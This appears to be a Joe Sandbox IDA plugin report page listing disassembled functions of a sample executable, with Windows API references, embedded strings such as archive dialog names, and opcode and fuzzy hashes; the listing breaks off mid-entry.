Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 2f4be8ccd338ed6113991eaebea027cfbbbb03ecbce989e8a332498b3cab5a6c
Instruction ID: 06569f67266c97ef3a16d941f7b264aa62232d365d91a9fd296a59e7d0e731b8
Opcode Fuzzy Hash: 2f4be8ccd338ed6113991eaebea027cfbbbb03ecbce989e8a332498b3cab5a6c
Instruction Fuzzy Hash: 2551C27150421AAFFB398F1CD845BAA77A5FF56320F24452DE802C7AA2E731ED40DB91

Uniqueness

Uniqueness Score: -1.00%

Function 008ABF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 008ABF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008ABF5C

Part of subcall function 008A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008ABF82
_free.LIBCMT ref: 008ABF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008ABFA4

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 534b5429fcbb1c902f3d1dacb4233c26642986924ec01bd48ffac606e90fcc1f
Instruction ID: 6e5cfaed70e3979e2c99ce0d04c53b31c5aa76cd4c8fb244a698de8f45a74a52
Opcode Fuzzy Hash: 534b5429fcbb1c902f3d1dacb4233c26642986924ec01bd48ffac606e90fcc1f
Instruction Fuzzy Hash: 60018472605A157F3321167A5C4DC7B7B6DFEC3BA13180229F904C2542EF608D0195B1

Uniqueness

Uniqueness Score: -1.00%

Function 008A9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,008C1030,00000200,008A91AD,008A617E,?,?,?,?,0088D984,?,?,?,00000004,0088D710,?), ref: 008A986E
_free.LIBCMT ref: 008A98A3
_free.LIBCMT ref: 008A98CA
SetLastError.KERNEL32(00000000,008B3A34,00000050,008C1030), ref: 008A98D7
SetLastError.KERNEL32(00000000,008B3A34,00000050,008C1030), ref: 008A98E0

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: e078414bf1164ff64bf87d5a1afe5f61bcc70b2514026a3e0e3e3d5471fb5009
Instruction ID: 0ecf9a88962a340637be9976bc2d40fa7767470c25f4ccb543b035d64bc4086f
Opcode Fuzzy Hash: e078414bf1164ff64bf87d5a1afe5f61bcc70b2514026a3e0e3e3d5471fb5009
Instruction Fuzzy Hash: 1701F436148A096BF21233386C8991B262DFFD37B47210234F955D2EA2EF38CC029166

Uniqueness

Uniqueness Score: -1.00%

Function 00890EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 008911CF: ResetEvent.KERNEL32(?), ref: 008911E1
Part of subcall function 008911CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 008911F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00890F21
CloseHandle.KERNEL32(?,?), ref: 00890F3B
DeleteCriticalSection.KERNEL32(?), ref: 00890F54
CloseHandle.KERNEL32(?), ref: 00890F60
CloseHandle.KERNEL32(?), ref: 00890F6C

Part of subcall function 00890FE4: WaitForSingleObject.KERNEL32(?,000000FF,00891206,?), ref: 00890FEA
Part of subcall function 00890FE4: GetLastError.KERNEL32(?), ref: 00890FF6

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 3a86ed438b5c5eb156afe2d783b99a3066b3ea964fee2b11c343d1541d706dcb
Instruction ID: a9cdf191db35029db1f80e04ddcb69d028dae76714d9d3ab76c8b79fc51ee7a9
Opcode Fuzzy Hash: 3a86ed438b5c5eb156afe2d783b99a3066b3ea964fee2b11c343d1541d706dcb
Instruction Fuzzy Hash: C3012571504B44EFCB32AB64DD85BC6FBA9FF08710F000929F16B925A0CB757A55CB54

Uniqueness

Uniqueness Score: -1.00%

Function 008AC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008AC817

Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4

_free.LIBCMT ref: 008AC829
_free.LIBCMT ref: 008AC83B
_free.LIBCMT ref: 008AC84D
_free.LIBCMT ref: 008AC85F

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: cb622abb0d045f5b6e3280d9fa122a67824065242658ecf826f4bdcf5579c330
Instruction ID: 33668a9284f9833b8173f4355749f555ad162bf4ae3ac57e68ccac2e3b99edb7
Opcode Fuzzy Hash: cb622abb0d045f5b6e3280d9fa122a67824065242658ecf826f4bdcf5579c330
Instruction Fuzzy Hash: 36F01D72504200EFA620EB7CE986C5A73E9FB02754B645829F249D7D52CB74FC80CA75

Uniqueness

Uniqueness Score: -1.00%

Function 00891FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00891FE5
_wcslen.LIBCMT ref: 00891FF6
_wcslen.LIBCMT ref: 00892006
_wcslen.LIBCMT ref: 00892014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0088B371,?,?,00000000,?,?,?), ref: 0089202F

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 1536c09fbb071e428c64afdb959e3b2e0b821d70c9a27814a00e3dd057ab460e
Instruction ID: 85a7309c5216d01460621771949f7b0b30e20c210ffec26fb1118832437ab04a
Opcode Fuzzy Hash: 1536c09fbb071e428c64afdb959e3b2e0b821d70c9a27814a00e3dd057ab460e
Instruction Fuzzy Hash: 6DF06D32008018BBDF226F54EC09D8A3F26FB51770B118005F61A9B461CB729661D690

Uniqueness

Uniqueness Score: -1.00%

Function 008A8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008A891E

Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4

_free.LIBCMT ref: 008A8930
_free.LIBCMT ref: 008A8943
_free.LIBCMT ref: 008A8954
_free.LIBCMT ref: 008A8965

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4a98bf043db2db07cf44c90a2b4d33390dae09b8bd4dcf054553bb2dffbe510b
Instruction ID: a46d85d8f5b23ef2e3c9551e86f90e2f75d2f048e069da927bbee53c45d3be1b
Opcode Fuzzy Hash: 4a98bf043db2db07cf44c90a2b4d33390dae09b8bd4dcf054553bb2dffbe510b
Instruction Fuzzy Hash: 2CF03AB5814162CB9A4A7F28FC824867FA9F7267107040706F215DB6B1DF7189419BA2

Uniqueness

Uniqueness Score: -1.00%

Function 008915FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 008917BC
_swprintf.LIBCMT ref: 0089186B

Strings

%ls, xrefs: 00891641, 00891657
%s: %s, xrefs: 008917CB

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: c6f81ad2ce395eba38eba54fdd53e8cd11b50871fd216ad99e1469240fd707d9
Instruction ID: 7151b50380c61ea77408e2a958539c28da224bbd7a5b678152127a2d444d01c4
Opcode Fuzzy Hash: c6f81ad2ce395eba38eba54fdd53e8cd11b50871fd216ad99e1469240fd707d9
Instruction Fuzzy Hash: 8E51E67168C30BFAEE2236D48D4EF257665FB25B08F1C4516F386F44D1D5A29410B71B

Uniqueness

Uniqueness Score: -1.00%

Function 008A7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\o9jDrpZrgR.exe,00000104), ref: 008A7FAE
_free.LIBCMT ref: 008A8079
_free.LIBCMT ref: 008A8083

Strings

C:\Users\user\Desktop\o9jDrpZrgR.exe, xrefs: 008A7FA5, 008A7FAC, 008A7FDB, 008A8013

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\o9jDrpZrgR.exe
API String ID: 2506810119-2110599003
Opcode ID: 04750459e41da4cfe18bb168b01c09292a608752a3ff34feaae3da10a34da3b2
Instruction ID: 6383108bac69df3cf5757b2c21cb7a19cebea777919ccf80172bdb63bb0fa44c
Opcode Fuzzy Hash: 04750459e41da4cfe18bb168b01c09292a608752a3ff34feaae3da10a34da3b2
Instruction Fuzzy Hash: 92318DB1A04658EFEB21DF99DC8199EBBFCFB96310F104166E504DB611DA708A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008A31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008A31FB
_abort.LIBCMT ref: 008A3306

Strings

MOC, xrefs: 008A320D
RCC, xrefs: 008A3215

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 2bedf975adeda2fad45e7be76f4c61321af21402595300669efce61a03d8bafb
Instruction ID: 695ec70ad79b6a2c8222e0932464a64fcee4ffa62c1571a6aabbbf7bd2bc4a39
Opcode Fuzzy Hash: 2bedf975adeda2fad45e7be76f4c61321af21402595300669efce61a03d8bafb
Instruction Fuzzy Hash: 14417A71900209AFEF15DF98CC81AEEBBB5FF4A305F188059F904A7611E335EA50DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00887401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00887406

Part of subcall function 00883BBA: __EH_prolog.LIBCMT ref: 00883BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 008874CD

Part of subcall function 00887A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00887AAB
Part of subcall function 00887A9C: GetLastError.KERNEL32 ref: 00887AF1
Part of subcall function 00887A9C: CloseHandle.KERNEL32(?), ref: 00887B00

Strings

SeRestorePrivilege, xrefs: 00887460
SeSecurityPrivilege, xrefs: 0088744B

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 5148f7389cf943ce3d0905f8af8b3c54dc74593063a8fed9ad0df9cbb11fa969
Instruction ID: db72dddacd37e4cb5c965ff0793524dd4567e2c8207c6164d46df438a02bef93
Opcode Fuzzy Hash: 5148f7389cf943ce3d0905f8af8b3c54dc74593063a8fed9ad0df9cbb11fa969
Instruction Fuzzy Hash: 1D319071904258AADF11FBA89C49FEE7BB9FB09314F144055F445E7282DB748A448B62

Uniqueness

Uniqueness Score: -1.00%

Function 0089AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370

EndDialog.USER32(?,00000001), ref: 0089AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0089ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0089ADC2

Strings

ASKNEXTVOL, xrefs: 0089AD28

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 741660b4294bcb7b0380f8435a6fd26f13f928441a12c720763bba3dbe3b6664
Instruction ID: 816b342876d8cc12449fb501163d3b7f00e7c1054723245006efe3de98dd6d2d
Opcode Fuzzy Hash: 741660b4294bcb7b0380f8435a6fd26f13f928441a12c720763bba3dbe3b6664
Instruction Fuzzy Hash: 1A119632340200BFDF15AF68DC49F6A7769FB4A742F140410F241DB5A0C7619E4597A3

Uniqueness

Uniqueness Score: -1.00%

Function 0088D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0088D954
_strncpy.LIBCMT ref: 0088D99A

Part of subcall function 00891DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,008C1030,00000200,0088D928,00000000,?,00000050,008C1030), ref: 00891DC4

Strings

@%s, xrefs: 0088D93E
$%s, xrefs: 0088D949

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 8993cb04932947b18f731d63e12f3ee01941a8c441f62e9d0e8c4626b96ad8a7
Instruction ID: 4715d575b594bc327e4a381689b26c5379945251b67e21f1aa5b7b4e37245482
Opcode Fuzzy Hash: 8993cb04932947b18f731d63e12f3ee01941a8c441f62e9d0e8c4626b96ad8a7
Instruction Fuzzy Hash: 81213B72540348AAEF21EEA8CD45FEE7BE8FB05704F140512F920D62A2E675D6588B52

Uniqueness

Uniqueness Score: -1.00%

Function 00890E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0088AC5A,00000008,?,00000000,?,0088D22D,?,00000000), ref: 00890E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0088AC5A,00000008,?,00000000,?,0088D22D,?,00000000), ref: 00890E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0088AC5A,00000008,?,00000000,?,0088D22D,?,00000000), ref: 00890E9F

Strings

Thread pool initialization failed., xrefs: 00890EB7

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: dc404ed10eef913e4aafb6c97c7de8bdc68d9d4b320ac8b66e9f38e7d738159b
Instruction ID: 1f0212b869a88d43476c787491a1bf6b6f497d63e30d948c19419330f2c28462
Opcode Fuzzy Hash: dc404ed10eef913e4aafb6c97c7de8bdc68d9d4b320ac8b66e9f38e7d738159b
Instruction Fuzzy Hash: 4B1173B1A407099FC7216F7A9C849ABFBECFB59744F144C2EF1DAC2201D671A9418F54

Uniqueness

Uniqueness Score: -1.00%

Function 0089B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370

EndDialog.USER32(?,00000001), ref: 0089B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0089B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0089B304

Strings

GETPASSWORD1, xrefs: 0089B289

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: f564f02e46e37e605cfc2bf95cd0552ef60307c3a3f2ee4560303ebb8d24721f
Instruction ID: 04fc65fd263234b3845670e997e040971dcf79e0296b2609c9491b3b37c28bda
Opcode Fuzzy Hash: f564f02e46e37e605cfc2bf95cd0552ef60307c3a3f2ee4560303ebb8d24721f
Instruction Fuzzy Hash: C911A532940128B6DF22BBA4AE49FFE376CFF5A710F040021FA45F7280C7A59E459761

Uniqueness

Uniqueness Score: -1.00%

Function 0089DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 0089DD31
REPLACEFILEDLG, xrefs: 0089DD1C, 0089DD50

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
